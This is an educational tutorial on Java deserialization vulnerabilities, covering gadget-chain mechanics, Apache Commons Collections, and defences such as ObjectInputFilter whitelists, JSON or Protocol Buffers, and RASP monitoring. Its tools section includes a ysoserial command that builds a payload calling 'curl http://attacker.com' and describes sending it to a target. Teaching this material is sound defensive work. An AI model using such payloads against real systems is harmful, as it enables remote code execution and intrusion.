Deserialization Vulnerabilities and Protection (Advanced)

Deserialization Vulnerabilities and Protection (Advanced)

Description
A deserialization vulnerability is a security flaw that occurs when an application deserializes untrusted serialized data. Attackers can construct malicious serialized data to execute arbitrary code or perform unauthorized operations within the target system. In this advanced section, we will delve into the underlying mechanisms of Java deserialization vulnerabilities (such as gadget chain construction), common exploitation libraries (e.g., Apache Commons Collections), and modern protection frameworks (e.g., JDK native filters).

Process of Resolution

  1. Review of the Vulnerability Core Principle

    • Serialization: Converting an object into a byte stream for storage or transmission.
    • Deserialization: Restoring an object from a byte stream.
    • Cause of Vulnerability: If the data source is not strictly validated during deserialization, attackers can inject malicious serialized data to trigger dangerous methods in objects (e.g., Runtime.exec()).

  2. Analysis of Java Deserialization Gadget Chains

    • Key Concept: Gadget Chain
      Attackers combine method calls from multiple classes to form a path from the deserialization entry point to the execution of dangerous code. For example:
      • Starting Point: Deserialization entry class (e.g., HashMap's readObject method).
      • Intermediate Stepping Stones: Classes that can be invoked via reflection (e.g., implementations of the Transformer interface in Apache Commons Collections).
      • End Point: Dangerous methods (e.g., TemplatesImpl.newTransformer() for loading bytecode).
    • Example: Apache Commons Collections Gadget Chain
      • Attackers construct an InvokerTransformer, whose transform method can invoke arbitrary methods via reflection.
      • By combining ChainedTransformer and LazyMap, the chain of operations is automatically executed during deserialization, ultimately triggering command execution.

  3. Dynamic Detection and Exploitation Tools

    • Using tools (e.g., YSOSERIAL) to generate malicious payloads: 
      java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com" > payload.bin
    • Sending the generated payload to the target application's deserialization interface (e.g., Base64-encoded data in an HTTP request).

  4. Advanced Protection Solutions

    • Whitelist Filtering (JDK 9+)
      Use ObjectInputFilter to set a whitelist for deserialized classes: 
      ObjectInputFilter filter = ObjectInputFilter.Config.createFilter("com.example.*;!*");  
inputStream.setObjectInputFilter(filter);
    • Replace Serialization Protocol
      Adopt safer serialization formats such as JSON or Protocol Buffers, avoiding direct use of Java native serialization.
    • Runtime Monitoring
      Monitor deserialization operations via Java Agent technology to block suspicious call chains (e.g., using RASP solutions).

  5. Code Audit Key Points

    • Check whether implementations of all readObject and readResolve methods call dangerous functions.
    • Investigate whether known gadget chains exist in third-party libraries (e.g., historical vulnerabilities in Fastjson, XStream).

By understanding the logic behind gadget chain construction and implementing layered protection, the risk of deserialization vulnerabilities can be significantly reduced.